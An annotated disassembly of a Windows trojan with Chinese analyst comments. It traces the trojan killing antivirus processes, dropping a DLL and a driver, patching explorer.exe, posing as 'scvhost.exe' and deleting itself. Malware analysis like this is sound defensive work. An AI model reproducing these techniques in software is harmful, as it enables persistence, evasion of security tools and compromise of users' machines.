0040240C . 75 5B jnz short 00402469 ; 判断当前进程是不是explorer.exe,是继续,不是跳转
0040240E . A2 78124000 mov byte ptr [401278], al
00402413 . 8D5424 44 lea edx, dword ptr [esp+44]
00402417 . 8D8424 74060000 lea eax, dword ptr [esp+674]
0040241E . 52 push edx ; /StringToAdd
0040241F . 50 push eax ; |ConcatString
00402420 . FFD6 call esi ; \lstrcatA
00402422 . 8D4C24 34 lea ecx, dword ptr [esp+34] ; C:\WINDOWS\temp\Explorer.exe
00402426 . 8D9424 74070000 lea edx, dword ptr [esp+774]
0040242D . 51 push ecx ; /StringToAdd
0040242E . 52 push edx ; |ConcatString
0040242F . FFD6 call esi ; \lstrcatA
00402431 . 8D8424 74060000 lea eax, dword ptr [esp+674] ; C:\WINDOWS\system32\drivers\gm.dls
00402438 . 6A 00 push 0 ; /FailIfExists = FALSE
0040243A . 8D8C24 78070000 lea ecx, dword ptr [esp+778] ; |
00402441 . 50 push eax ; |NewFileName
00402442 . 51 push ecx ; |ExistingFileName
00402443 . FF15 78104000 call dword ptr [401078] ; \CopyFileA
00402449 . 6A 00 push 0 ; 复制C:\WINDOWS\system32\drivers\gm.dls为 C:\WINDOWS\temp\Explorer.exe
0040244B . 6A 00 push 0
0040244D . 8D9424 7C060000 lea edx, dword ptr [esp+67C]
00402454 . 68 E4104000 push 004010E4
00402459 . 52 push edx
0040245A . 68 C8124000 push 004012C8 ; open
0040245F . 6A 00 push 0
00402461 . E8 DAEFFFFF call <动态获得函数地址并运行文件>
00402466 . 83C4 18 add esp, 18
00402469 > E8 D2F9FFFF call <设置权限>
0040246E . 6A 00 push 0 ; /pThreadId = NULL
00402470 . 6A 00 push 0 ; |CreationFlags = 0
00402472 . 6A 00 push 0 ; |pThreadParm = NULL
00402474 . 68 20224000 push 00402220 ; |ThreadFunction = 412489_f.00402220
00402479 . 6A 00 push 0 ; |StackSize = 0
0040247B . 6A 00 push 0 ; |pSecurity = NULL
0040247D . FF15 74104000 call dword ptr [401074] ; \CreateThread
00402483 . 8B2D 9C104000 mov ebp, dword ptr [40109C] ; kernel32.Sleep
00402489 . 68 88130000 push 1388 ; /Timeout = 5000. ms
0040248E . FFD5 call ebp ; \Sleep
00402490 . E8 DBF4FFFF call 00401970 ; 关键call 1 关闭指定进程
00402495 . 68 E8030000 push 3E8
0040249A . FFD5 call ebp ; kernel32.Sleep
0040249C . E8 3FF8FFFF call 00401CE0 ; 关键call 2释放动态链接库C:\WINDOWS\system32\44810500.dll,创建进程,调用C:\WINDOWS\system32\rundll32.exe加载 44810500.dll
004024A1 . 68 E8030000 push 3E8
004024A6 . FFD5 call ebp ; kernel32.Sleep
004024A8 . B9 3F000000 mov ecx, 3F
004024AD . 33C0 xor eax, eax
004024AF . 8DBC24 70030000 lea edi, dword ptr [esp+370]
004024B6 . 68 FF000000 push 0FF ; /BufSize = FF (255.)
004024BB . F3:AB rep stos dword ptr es:[edi] ; |
004024BD . 66:AB stos word ptr es:[edi] ; |
004024BF . AA stos byte ptr es:[edi] ; |
004024C0 . B9 3F000000 mov ecx, 3F ; |
004024C5 . 33C0 xor eax, eax ; |
004024C7 . 8DBC24 78090000 lea edi, dword ptr [esp+978] ; |
004024CE . F3:AB rep stos dword ptr es:[edi] ; |
004024D0 . 66:AB stos word ptr es:[edi] ; |
004024D2 . AA stos byte ptr es:[edi] ; |
004024D3 . 8D8424 74030000 lea eax, dword ptr [esp+374] ; |
004024DA . 50 push eax ; |Buffer
004024DB . FF15 90104000 call dword ptr [401090] ; \GetSystemDirectoryA
004024E1 . FF15 68104000 call dword ptr [401068] ; [GetTickCount
004024E7 . 50 push eax ; /<%d>
004024E8 . 8D8C24 78090000 lea ecx, dword ptr [esp+978] ; |
004024EF . 68 D8134000 push 004013D8 ; |%d.exe
004024F4 . 51 push ecx ; |s
004024F5 . FF15 DC104000 call dword ptr [4010DC] ; \wsprintfA
004024FB . 83C4 0C add esp, 0C
004024FE . 8D9424 70030000 lea edx, dword ptr [esp+370]
00402505 . 68 D4134000 push 004013D4 ; \
0040250A . 52 push edx
0040250B . FFD6 call esi ; kernel32.lstrcatA
0040250D . 8D8424 74090000 lea eax, dword ptr [esp+974]
00402514 . 8D8C24 70030000 lea ecx, dword ptr [esp+370]
0040251B . 50 push eax
0040251C . 51 push ecx
0040251D . FFD6 call esi ; kernel32.lstrcatA
0040251F . 8D9424 70030000 lea edx, dword ptr [esp+370] ; C:\WINDOWS\system32\45757859.exe
00402526 . 6A 65 push 65
00402528 . 52 push edx
00402529 . E8 02F3FFFF call <创建文件> 创建文件C:\WINDOWS\system32\45757859.exe
0040252E . 6A 00 push 0
00402530 . 6A 00 push 0
00402532 . 8D8424 78030000 lea eax, dword ptr [esp+378]
00402539 . 68 E4104000 push 004010E4
0040253E . 50 push eax
0040253F . 68 C8124000 push 004012C8 ; open
00402544 . 6A 00 push 0
00402546 . E8 F5EEFFFF call <动态获得函数地址并运行文件>
0040254B . 83C4 18 add esp, 18
0040254E . 68 E8030000 push 3E8
00402553 . FFD5 call ebp
00402555 . 885C24 58 mov byte ptr [esp+58], bl ; \drivers\pcidump
00402559 . C64424 59 64 mov byte ptr [esp+59], 64
0040255E . C64424 5A 72 mov byte ptr [esp+5A], 72
00402563 . C64424 5B 69 mov byte ptr [esp+5B], 69
00402568 . C64424 5C 76 mov byte ptr [esp+5C], 76
0040256D . C64424 5D 65 mov byte ptr [esp+5D], 65
00402572 . C64424 5E 72 mov byte ptr [esp+5E], 72
00402577 . C64424 5F 73 mov byte ptr [esp+5F], 73
0040257C . 885C24 60 mov byte ptr [esp+60], bl
00402580 . C64424 61 70 mov byte ptr [esp+61], 70
00402585 . C64424 62 63 mov byte ptr [esp+62], 63
0040258A . C64424 63 69 mov byte ptr [esp+63], 69
0040258F . C64424 64 64 mov byte ptr [esp+64], 64
00402594 . C64424 65 75 mov byte ptr [esp+65], 75
00402599 . C64424 66 6D mov byte ptr [esp+66], 6D
0040259E . C64424 67 70 mov byte ptr [esp+67], 70
004025A3 . C64424 68 2E mov byte ptr [esp+68], 2E
004025A8 . B9 3F000000 mov ecx, 3F
004025AD . 33C0 xor eax, eax
004025AF . 8D7C24 70 lea edi, dword ptr [esp+70]
004025B3 . 885C24 10 mov byte ptr [esp+10], bl
004025B7 . F3:AB rep stos dword ptr es:[edi]
004025B9 . 66:AB stos word ptr es:[edi]
004025BB . AA stos byte ptr es:[edi]
004025BC . B9 3F000000 mov ecx, 3F
004025C1 . 33C0 xor eax, eax
004025C3 . 8DBC24 74040000 lea edi, dword ptr [esp+474]
004025CA . 885C24 13 mov byte ptr [esp+13], bl
004025CE . F3:AB rep stos dword ptr es:[edi]
004025D0 . 66:AB stos word ptr es:[edi]
004025D2 . AA stos byte ptr es:[edi]
004025D3 . B9 3F000000 mov ecx, 3F
004025D8 . 33C0 xor eax, eax
004025DA . 8DBC24 74080000 lea edi, dword ptr [esp+874]
004025E1 . 8B1D 90104000 mov ebx, dword ptr [401090] ; kernel32.GetSystemDirectoryA
004025E7 . F3:AB rep stos dword ptr es:[edi]
004025E9 . 66:AB stos word ptr es:[edi]
004025EB . AA stos byte ptr es:[edi]
004025EC . B9 3F000000 mov ecx, 3F
004025F1 . 33C0 xor eax, eax
004025F3 . 8DBC24 70020000 lea edi, dword ptr [esp+270]
004025FA . 68 FF000000 push 0FF ; /BufSize = FF (255.)
004025FF . F3:AB rep stos dword ptr es:[edi] ; |
00402601 . 66:AB stos word ptr es:[edi] ; |
00402603 . 8D8C24 74020000 lea ecx, dword ptr [esp+274] ; |
0040260A . C64424 6D 73 mov byte ptr [esp+6D], 73 ; |
0040260F . 51 push ecx ; |Buffer
00402610 . C64424 72 79 mov byte ptr [esp+72], 79 ; |
00402615 . C64424 73 73 mov byte ptr [esp+73], 73 ; |
0040261A . C64424 74 00 mov byte ptr [esp+74], 0 ; |
0040261F . C64424 19 3F mov byte ptr [esp+19], 3F ; |
00402624 . C64424 1A 3F mov byte ptr [esp+1A], 3F ; |
00402629 . C64424 1C 00 mov byte ptr [esp+1C], 0 ; |
0040262E . AA stos byte ptr es:[edi] ; |
0040262F . FFD3 call ebx ; \GetSystemDirectoryA
00402631 . 8D5424 58 lea edx, dword ptr [esp+58]
00402635 . 8D8424 70020000 lea eax, dword ptr [esp+270]
0040263C . 52 push edx
0040263D . 50 push eax
0040263E . FFD6 call esi
00402640 . 8D4C24 70 lea ecx, dword ptr [esp+70]
00402644 . 68 FF000000 push 0FF ; /BufSize = FF (255.)
00402649 . 51 push ecx ; |PathBuffer
0040264A . 6A 00 push 0 ; |hModule = NULL
0040264C . FF15 58104000 call dword ptr [401058] ; \GetModuleFileNameA
00402652 . 8D9424 70020000 lea edx, dword ptr [esp+270]
00402659 . 6A 67 push 67
0040265B . 52 push edx
0040265C . E8 CFF1FFFF call <创建文件> ; 创建文件"C:\WINDOWS\system32\drivers\pcidump.sys"
00402661 . 8D8424 70020000 lea eax, dword ptr [esp+270]
00402668 . 50 push eax
00402669 . E8 22EEFFFF call 00401490 ; 启动服务
0040266E . 83C4 04 add esp, 4
00402671 . 8D8C24 780A0000 lea ecx, dword ptr [esp+A78]
00402678 . 68 FF000000 push 0FF ; /BufSize = FF (255.)
0040267D . 51 push ecx ; |Buffer
0040267E . FF15 7C104000 call dword ptr [40107C] ; \GetWindowsDirectoryA
00402684 . 8B3D 8C104000 mov edi, dword ptr [40108C] ; kernel32.lstrcpyA
0040268A . 8D5424 10 lea edx, dword ptr [esp+10]
0040268E . 8D8424 74040000 lea eax, dword ptr [esp+474]
00402695 . 52 push edx ; /String2
00402696 . 50 push eax ; |String1
00402697 . FFD7 call edi ; \lstrcpyA
00402699 . 8D8C24 780A0000 lea ecx, dword ptr [esp+A78]
004026A0 . 8D9424 74040000 lea edx, dword ptr [esp+474]
004026A7 . 51 push ecx
004026A8 . 52 push edx
004026A9 . FFD6 call esi
004026AB . 8D4424 18 lea eax, dword ptr [esp+18]
004026AF . 8D8C24 74040000 lea ecx, dword ptr [esp+474]
004026B6 . 50 push eax
004026B7 . 51 push ecx
004026B8 . FFD6 call esi
004026BA . 8D5424 10 lea edx, dword ptr [esp+10]
004026BE . 8D8424 74080000 lea eax, dword ptr [esp+874]
004026C5 . 52 push edx
004026C6 . 50 push eax
004026C7 . FFD7 call edi
004026C9 . 8D4C24 70 lea ecx, dword ptr [esp+70]
004026CD . 8D9424 74080000 lea edx, dword ptr [esp+874]
004026D4 . 51 push ecx
004026D5 . 52 push edx
004026D6 . FFD6 call esi
004026D8 . 8D8424 74080000 lea eax, dword ptr [esp+874]
004026DF . 8D8C24 74040000 lea ecx, dword ptr [esp+474]
004026E6 . 50 push eax
004026E7 . 51 push ecx
004026E8 . E8 63EFFFFF call 00401650 ; 关键call 3 修改gm.dls和explorer.exe
004026ED . 8D9424 78020000 lea edx, dword ptr [esp+278]
004026F4 . 52 push edx
004026F5 . E8 B6EEFFFF call 004015B0 ; 删除驱动文件
004026FA . 83C4 0C add esp, 0C
004026FD . 68 E8030000 push 3E8
00402702 . FFD5 call ebp ; kernel32.Sleep
00402704 . B9 3F000000 mov ecx, 3F
00402709 . 33C0 xor eax, eax
0040270B . 8D7C24 70 lea edi, dword ptr [esp+70]
0040270F . 68 FF000000 push 0FF ; /BufSize = FF (255.)
00402714 . F3:AB rep stos dword ptr es:[edi] ; |
00402716 . 66:AB stos word ptr es:[edi] ; |
00402718 . AA stos byte ptr es:[edi] ; |
00402719 . B9 3F000000 mov ecx, 3F ; |
0040271E . 33C0 xor eax, eax ; |
00402720 . 8DBC24 74010000 lea edi, dword ptr [esp+174] ; |
00402727 . C64424 2C 73 mov byte ptr [esp+2C], 73 ; |
0040272C . F3:AB rep stos dword ptr es:[edi] ; |
0040272E . 66:AB stos word ptr es:[edi] ; |
00402730 . AA stos byte ptr es:[edi] ; |
00402731 . 8D4424 74 lea eax, dword ptr [esp+74] ; |
00402735 . C64424 2D 63 mov byte ptr [esp+2D], 63 ; |
0040273A . 50 push eax ; |PathBuffer
0040273B . 6A 00 push 0 ; |hModule = NULL
0040273D . C64424 36 76 mov byte ptr [esp+36], 76 ; |输入svhost.exe
00402742 . C64424 37 68 mov byte ptr [esp+37], 68 ; |
00402747 . C64424 38 6F mov byte ptr [esp+38], 6F ; |
0040274C . C64424 39 73 mov byte ptr [esp+39], 73 ; |
00402751 . C64424 3A 74 mov byte ptr [esp+3A], 74 ; |
00402756 . C64424 3B 2E mov byte ptr [esp+3B], 2E ; |
0040275B . C64424 3C 65 mov byte ptr [esp+3C], 65 ; |
00402760 . C64424 3D 78 mov byte ptr [esp+3D], 78 ; |
00402765 . C64424 3E 65 mov byte ptr [esp+3E], 65 ; |
0040276A . C64424 3F 00 mov byte ptr [esp+3F], 0 ; |
0040276F . FF15 58104000 call dword ptr [401058] ; \GetModuleFileNameA
00402775 . 8D8C24 70010000 lea ecx, dword ptr [esp+170]
0040277C . 68 FF000000 push 0FF
00402781 . 51 push ecx
00402782 . FFD3 call ebx
00402784 . 8D9424 70010000 lea edx, dword ptr [esp+170]
0040278B . 68 D4134000 push 004013D4 ; \
00402790 . 52 push edx
00402791 . FFD6 call esi ; kernel32.lstrcatA
00402793 . 8D4424 28 lea eax, dword ptr [esp+28]
00402797 . 8D8C24 70010000 lea ecx, dword ptr [esp+170]
0040279E . 50 push eax ; // "scvhost.exe"
0040279F . 51 push ecx ; "C:\WINDOWS\system32\"
004027A0 . FFD6 call esi
004027A2 . 8D9424 70010000 lea edx, dword ptr [esp+170] ; 把"C:\trojan\trojan\412489_fm01.exe"复制为"C:\WINDOWS\system32\scvhost.exe"
004027A9 . 6A 01 push 1 ; /Flags = REPLACE_EXISTING
004027AB . 8D4424 74 lea eax, dword ptr [esp+74] ; |
004027AF . 52 push edx ; |0012F444 0012F5BC |NewName = "C:\WINDOWS\system32\scvhost.exe"
004027B0 . 50 push eax ; |0012F440 0012F4BC |ExistingName = "C:\trojan\trojan\412489_fm01.exe"
004027B1 . FF15 70104000 call dword ptr [401070] ; \MoveFileExA
004027B7 . 8B35 48104000 mov esi, dword ptr [401048] ; kernel32.lstrcmpiA
004027BD . 8D8C24 70010000 lea ecx, dword ptr [esp+170]
004027C4 . 8D5424 70 lea edx, dword ptr [esp+70]
004027C8 . 51 push ecx ; /String2
004027C9 . 52 push edx ; |String1
004027CA . FFD6 call esi ; \lstrcmpiA
004027CC . 85C0 test eax, eax
004027CE . 74 18 je short 004027E8
004027D0 . 8D8424 74050000 lea eax, dword ptr [esp+574]
004027D7 . 8D4C24 70 lea ecx, dword ptr [esp+70]
004027DB . 50 push eax ; /0012F448 0012F9C0 \String2 = "C:\WINDOWS\Explorer.EXE"
004027DC . 51 push ecx ; |0012F444 0012F4BC |String1 = "C:\trojan\trojan\412489_fm01.exe"
004027DD . FFD6 call esi ; \lstrcmpiA
004027DF . 85C0 test eax, eax
004027E1 . 74 05 je short 004027E8
004027E3 . E8 88F3FFFF call 00401B70 ; c关键all 4 自删除函数
004027E8 > 5F pop edi
004027E9 . 5E pop esi
004027EA . 5D pop ebp
004027EB . 33C0 xor eax, eax
004027ED . 5B pop ebx
004027EE . 81C4 680B0000 add esp, 0B68
004027F4 . C2 1000 retn 10
关键call 1
00401970 /$ 83EC 58 sub esp, 58
00401973 |. 53 push ebx
00401974 |. B3 63 mov bl, 63
00401976 |. B0 20 mov al, 20
00401978 |. B2 2F mov dl, 2F
0040197A |. B1 65 mov cl, 65
0040197C |. 885C24 04 mov byte ptr [esp+4], bl
......
00401AD1 |. C64424 52 75 mov byte ptr [esp+52], 75
00401AD6 |. 68 D0124000 push 004012D0 ; ekrn.exe
00401ADB |. C64424 57 69 mov byte ptr [esp+57], 69
00401AE0 |. C64424 58 2E mov byte ptr [esp+58], 2E
00401AE5 |. 884C24 59 mov byte ptr [esp+59], cl
00401AE9 |. C64424 5A 78 mov byte ptr [esp+5A], 78
00401AEE |. 884C24 5B mov byte ptr [esp+5B], cl
00401AF2 |. 884424 5C mov byte ptr [esp+5C], al
00401AF6 |. 885424 5D mov byte ptr [esp+5D], dl
00401AFA |. C64424 5E 66 mov byte ptr [esp+5E], 66
00401AFF |. E8 ECFDFFFF call 004018F0 ; 关闭指定进程
00401B04 |. 83C4 04 add esp, 4
00401B07 |. 85C0 test eax, eax
00401B09 |. 5B pop ebx
00401B0A |. 74 5C je short 00401B68
00401B0C |. 6A 00 push 0
00401B0E |. 6A 00 push 0
00401B10 |. 8D4424 08 lea eax, dword ptr [esp+8]
00401B14 |. 68 E4104000 push 004010E4
00401B19 |. 50 push eax
00401B1A |. 68 C8124000 push 004012C8 ; open
00401B1F |. 6A 00 push 0
00401B21 |. E8 1AF9FFFF call <动态获得函数地址并运行文件>
00401B26 |. 6A 00 push 0
00401B28 |. 6A 00 push 0
00401B2A |. 8D4C24 38 lea ecx, dword ptr [esp+38]
00401B2E |. 68 E4104000 push 004010E4
00401B33 |. 51 push ecx
00401B34 |. 68 C8124000 push 004012C8 ; open
00401B39 |. 6A 00 push 0
00401B3B |. E8 00F9FFFF call <动态获得函数地址并运行文件>
00401B40 |. 6A 00 push 0
00401B42 |. 6A 00 push 0
00401B44 |. 8D5424 70 lea edx, dword ptr [esp+70]
00401B48 |. 68 E4104000 push 004010E4
00401B4D |. 52 push edx
00401B4E |. 68 C8124000 push 004012C8 ; open
00401B53 |. 6A 00 push 0
00401B55 |. E8 E6F8FFFF call <动态获得函数地址并运行文件>
00401B5A |. 83C4 48 add esp, 48
00401B5D |. 68 F4010000 push 1F4 ; /Timeout = 500. ms
00401B62 |. FF15 9C104000 call dword ptr [40109C] ; \Sleep
00401B68 |> 83C4 58 add esp, 58
00401B6B \. C3 retn
关键call 2
00401CE0 /$ 81EC 54030000 sub esp, 354
00401CE6 |. 53 push ebx
00401CE7 |. 56 push esi
00401CE8 |. 57 push edi
00401CE9 |. B9 3F000000 mov ecx, 3F
00401CEE |. 33C0 xor eax, eax
00401CF0 |. 8D7C24 60 lea edi, dword ptr [esp+60]
00401CF4 |. F3:AB rep stos dword ptr es:[edi]
00401CF6 |. 66:AB stos word ptr es:[edi]
00401CF8 |. AA stos byte ptr es:[edi]
00401CF9 |. B9 3F000000 mov ecx, 3F
00401CFE |. 33C0 xor eax, eax
00401D00 |. 8DBC24 60020000 lea edi, dword ptr [esp+260]
00401D07 |. F3:AB rep stos dword ptr es:[edi]
00401D09 |. 66:AB stos word ptr es:[edi]
00401D0B |. AA stos byte ptr es:[edi]
00401D0C |. B9 3F000000 mov ecx, 3F
00401D11 |. 33C0 xor eax, eax
00401D13 |. 8DBC24 60010000 lea edi, dword ptr [esp+160]
00401D1A |. F3:AB rep stos dword ptr es:[edi]
00401D1C |. 66:AB stos word ptr es:[edi]
00401D1E |. AA stos byte ptr es:[edi]
00401D1F |. FF15 68104000 call dword ptr [401068] ; [GetTickCount
00401D25 |. 50 push eax ; /<%d>
00401D26 |. 8D8424 64020000 lea eax, dword ptr [esp+264] ; |
00401D2D |. 68 54134000 push 00401354 ; |%d.dll
00401D32 |. 50 push eax ; |s
00401D33 |. FF15 DC104000 call dword ptr [4010DC] ; \wsprintfA
00401D39 |. 83C4 0C add esp, 0C ; 44810500.dll
00401D3C |. 8D4C24 60 lea ecx, dword ptr [esp+60]
00401D40 |. 51 push ecx ; /Buffer
00401D41 |. 68 FF000000 push 0FF ; |BufSize = FF (255.)
00401D46 |. FF15 AC104000 call dword ptr [4010AC] ; \GetTempPathA
00401D4C |. 8B35 94104000 mov esi, dword ptr [401094] ; kernel32.lstrcatA
00401D52 |. 8D9424 60020000 lea edx, dword ptr [esp+260]
00401D59 |. 8D4424 60 lea eax, dword ptr [esp+60]
00401D5D |. 52 push edx ; /StringToAdd
00401D5E |. 50 push eax ; |ConcatString
00401D5F |. FFD6 call esi ; \lstrcatA
00401D61 |. 8D4C24 60 lea ecx, dword ptr [esp+60] ; //连接字符串C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\44810500.dll
00401D65 |. 6A 66 push 66
00401D67 |. 51 push ecx
00401D68 |. E8 C3FAFFFF call <创建文件> //创建 44810500.dll文件
00401D6D |. 8B1D 8C104000 mov ebx, dword ptr [40108C] ; kernel32.lstrcpyA
00401D73 |. 8D5424 60 lea edx, dword ptr [esp+60]
00401D77 |. 8D8424 60010000 lea eax, dword ptr [esp+160]
00401D7E |. 52 push edx ; /String2
00401D7F |. 50 push eax ; |String1
00401D80 |. FFD3 call ebx ; \lstrcpyA
00401D82 |. 8D4C24 60 lea ecx, dword ptr [esp+60]
00401D86 |. 68 48134000 push 00401348 ; testall
00401D8B |. 51 push ecx
00401D8C |. FFD6 call esi
00401D8E |. B9 3F000000 mov ecx, 3F
00401D93 |. 33C0 xor eax, eax
00401D95 |. 8DBC24 60010000 lea edi, dword ptr [esp+160]
00401D9C |. 8D9424 60010000 lea edx, dword ptr [esp+160]
00401DA3 |. F3:AB rep stos dword ptr es:[edi]
00401DA5 |. 66:AB stos word ptr es:[edi]
00401DA7 |. 68 38134000 push 00401338 ; rundll32.exe
00401DAC |. 52 push edx
00401DAD |. AA stos byte ptr es:[edi]
00401DAE |. FFD3 call ebx ; kernel32.lstrcpyA
00401DB0 |. 8D4424 60 lea eax, dword ptr [esp+60]
00401DB4 |. 8D8C24 60010000 lea ecx, dword ptr [esp+160]
00401DBB |. 50 push eax
00401DBC |. 51 push ecx
00401DBD |. FFD6 call esi
00401DBF |. B9 11000000 mov ecx, 11
00401DC4 |. 33C0 xor eax, eax
00401DC6 |. 8D7C24 1C lea edi, dword ptr [esp+1C]
00401DCA |. 8D5424 0C lea edx, dword ptr [esp+C]
00401DCE |. F3:AB rep stos dword ptr es:[edi]
00401DD0 |. 8D4C24 1C lea ecx, dword ptr [esp+1C]
00401DD4 |. 52 push edx ; /pProcessInfo
00401DD5 |. 51 push ecx ; |pStartupInfo
00401DD6 |. C74424 24 44000000 mov dword ptr [esp+24], 44 ; |
00401DDE |. 894424 50 mov dword ptr [esp+50], eax ; |
00401DE2 |. 66:C74424 54 0500 mov word ptr [esp+54], 5 ; |
00401DE9 |. 894424 60 mov dword ptr [esp+60], eax ; |
00401DED |. 894424 64 mov dword ptr [esp+64], eax ; |
00401DF1 |. 50 push eax ; |CurrentDir => NULL
00401DF2 |. 50 push eax ; |pEnvironment => NULL
00401DF3 |. 50 push eax ; |CreationFlags => 0
00401DF4 |. 6A 01 push 1 ; |InheritHandles = TRUE
00401DF6 |. 50 push eax ; |pThreadSecurity => NULL
00401DF7 |. 8D9424 7C010000 lea edx, dword ptr [esp+17C] ; |
00401DFE |. 50 push eax ; |pProcessSecurity => NULL
00401DFF |. 52 push edx ; |CommandLine
00401E00 |. 50 push eax ; |ModuleFileName => NULL
00401E01 |. FF15 60104000 call dword ptr [401060] ; \CreateProcessA
00401E07 |. 5F pop edi ; 命令行加载该dll CommandLine = "rundll32.exe C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\44810500.dll testall"
00401E08 |. 5E pop esi
00401E09 |. 85C0 test eax, eax
00401E0B |. 5B pop ebx
00401E0C |. 74 18 je short 00401E26
00401E0E |. 8B4424 04 mov eax, dword ptr [esp+4]
00401E12 |. 50 push eax ; /hObject
00401E13 |. FF15 64104000 call dword ptr [401064] ; \CloseHandle
00401E19 |. 8B4C24 00 mov ecx, dword ptr [esp]
00401E1D |. 6A FF push -1 ; /Timeout = INFINITE
00401E1F |. 51 push ecx ; |hObject
00401E20 |. FF15 5C104000 call dword ptr [40105C] ; \WaitForSingleObject
00401E26 |> 8D9424 54010000 lea edx, dword ptr [esp+154]
00401E2D |. 52 push edx ; //FileName = "rundll32.exe C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\44810500.dll testall"
00401E2E |. FF15 A0104000 call dword ptr [4010A0] ; \DeleteFileA
00401E34 |. 81C4 54030000 add esp, 354
00401E3A \. C3 retn
关键call 3
00401650 /$ 81EC 30020000 sub esp, 230
00401656 |. 8A0D C0124000 mov cl, byte ptr [4012C0]
0040165C |. B0 5C mov al, 5C
0040165E |. 884424 00 mov byte ptr [esp], al
00401662 |. 884424 01 mov byte ptr [esp+1], al
00401666 |. 884424 03 mov byte ptr [esp+3], al
0040166A |. B0 70 mov al, 70
0040166C |. 884424 04 mov byte ptr [esp+4], al
00401670 |. 884424 0A mov byte ptr [esp+A], al
00401674 |. A1 BC124000 mov eax, dword ptr [4012BC]
00401679 |. 57 push edi
0040167A |. 894424 1C mov dword ptr [esp+1C], eax
0040167E |. 884C24 20 mov byte ptr [esp+20], cl
00401682 |. B9 3F000000 mov ecx, 3F
00401687 |. 33C0 xor eax, eax
00401689 |. 8D7C24 34 lea edi, dword ptr [esp+34]
0040168D |. 6A 00 push 0 ; /hTemplateFile = NULL
0040168F |. F3:AB rep stos dword ptr es:[edi] ; |
00401691 |. 66:AB stos word ptr es:[edi] ; |
00401693 |. AA stos byte ptr es:[edi] ; |
00401694 |. B9 3F000000 mov ecx, 3F ; |
00401699 |. 33C0 xor eax, eax ; |
0040169B |. 8DBC24 38010000 lea edi, dword ptr [esp+138] ; |
004016A2 |. 68 80000000 push 80 ; |Attributes = NORMAL
004016A7 |. F3:AB rep stos dword ptr es:[edi] ; |
004016A9 |. 6A 03 push 3 ; |Mode = OPEN_EXISTING
004016AB |. 6A 00 push 0 ; |pSecurity = NULL
004016AD |. 66:AB stos word ptr es:[edi] ; |
004016AF |. 6A 00 push 0 ; |ShareMode = 0
004016B1 |. 8D5424 18 lea edx, dword ptr [esp+18] ; |
004016B5 |. 68 000000C0 push C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
004016BA |. 52 push edx ; |FileName
004016BB |. C64424 22 2E mov byte ptr [esp+22], 2E ; |
004016C0 |. C64424 25 63 mov byte ptr [esp+25], 63 ; |
004016C5 |. C64424 26 69 mov byte ptr [esp+26], 69 ; |
004016CA |. C64424 27 64 mov byte ptr [esp+27], 64 ; |
004016CF |. C64424 28 75 mov byte ptr [esp+28], 75 ; |
004016D4 |. C64424 29 6D mov byte ptr [esp+29], 6D ; |
004016D9 |. C64424 2B 00 mov byte ptr [esp+2B], 0 ; |
004016DE |. AA stos byte ptr es:[edi] ; |
004016DF |. FF15 88104000 call dword ptr [401088] ; \CreateFileA
004016E5 |. 8BF8 mov edi, eax
004016E7 |. 85FF test edi, edi
004016E9 |. 0F84 2D010000 je 0040181C
004016EF |. A0 78124000 mov al, byte ptr [401278]
004016F4 |. 53 push ebx
004016F5 |. 55 push ebp
004016F6 |. 8BAC24 40020000 mov ebp, dword ptr [esp+240]
004016FD |. 56 push esi
004016FE |. 8B35 8C104000 mov esi, dword ptr [40108C] ; kernel32.lstrcpyA
00401704 |. 84C0 test al, al
00401706 |. 0F84 A8000000 je 004017B4
0040170C |. 8B0D B0124000 mov ecx, dword ptr [4012B0]
00401712 |. A1 AC124000 mov eax, dword ptr [4012AC]
00401717 |. 8B15 B4124000 mov edx, dword ptr [4012B4]
0040171D |. 894C24 34 mov dword ptr [esp+34], ecx
00401721 |. 894424 30 mov dword ptr [esp+30], eax
00401725 |. A1 B8124000 mov eax, dword ptr [4012B8]
0040172A |. 8D8C24 40010000 lea ecx, dword ptr [esp+140]
00401731 |. 68 FF000000 push 0FF ; /BufSize = FF (255.)
00401736 |. 51 push ecx ; |Buffer
00401737 |. 895424 40 mov dword ptr [esp+40], edx ; |
0040173B |. 894424 44 mov dword ptr [esp+44], eax ; |
0040173F |. FF15 90104000 call dword ptr [401090] ; \GetSystemDirectoryA
00401745 |. 8D5424 28 lea edx, dword ptr [esp+28]
00401749 |. 8D4424 40 lea eax, dword ptr [esp+40]
0040174D |. 52 push edx ; /String2
0040174E |. 50 push eax ; |String1
0040174F |. FFD6 call esi ; \lstrcpyA
00401751 |. 8B1D 94104000 mov ebx, dword ptr [401094] ; kernel32.lstrcatA
00401757 |. 8D8C24 40010000 lea ecx, dword ptr [esp+140]
0040175E |. 8D5424 40 lea edx, dword ptr [esp+40]
00401762 |. 51 push ecx ; /StringToAdd
00401763 |. 52 push edx ; |ConcatString
00401764 |. FFD3 call ebx ; \lstrcatA
00401766 |. 8D4424 30 lea eax, dword ptr [esp+30]
0040176A |. 8D4C24 40 lea ecx, dword ptr [esp+40]
0040176E |. 50 push eax ; /StringToAdd
0040176F |. 51 push ecx ; |ConcatString
00401770 |. FFD3 call ebx ; \lstrcatA
00401772 |. 55 push ebp ; /String2
00401773 |. 68 E8104000 push 004010E8 ; |123321
00401778 |. FFD6 call esi ; \lstrcpyA
0040177A |. 8D5424 40 lea edx, dword ptr [esp+40]
0040177E |. 52 push edx ; /String2
0040177F |. 68 B0114000 push 004011B0 ; |String1 = 412489_f.004011B0
00401784 |. FFD6 call esi ; \lstrcpyA
00401786 |. 8D4424 1C lea eax, dword ptr [esp+1C]
0040178A |. 6A 00 push 0 ; /pOverlapped = NULL
0040178C |. 50 push eax ; |pBytesReturned
0040178D |. 6A 00 push 0 ; |OutBufferSize = 0
0040178F |. 6A 00 push 0 ; |OutBuffer = NULL
00401791 |. 8D4C24 30 lea ecx, dword ptr [esp+30] ; |
00401795 |. 6A 08 push 8 ; |InBufferSize = 8
00401797 |. 51 push ecx ; |InBuffer
00401798 |. 68 14202200 push 222014 ; |IoControlCode = 222014
0040179D |. 57 push edi ; |hDevice
0040179E |. C74424 40 E8104000 mov dword ptr [esp+40], 004010E8 ; |123321
004017A6 |. C74424 44 B0114000 mov dword ptr [esp+44], 004011B0 ; |C:\WINDOWS\system32\drivers\gm.dls
004017AE |. FF15 98104000 call dword ptr [401098] ; \DeviceIoControl
004017B4 |> 8B1D 9C104000 mov ebx, dword ptr [40109C] ; kernel32.Sleep
004017BA |. 68 B80B0000 push 0BB8 ; /Timeout = 3000. ms
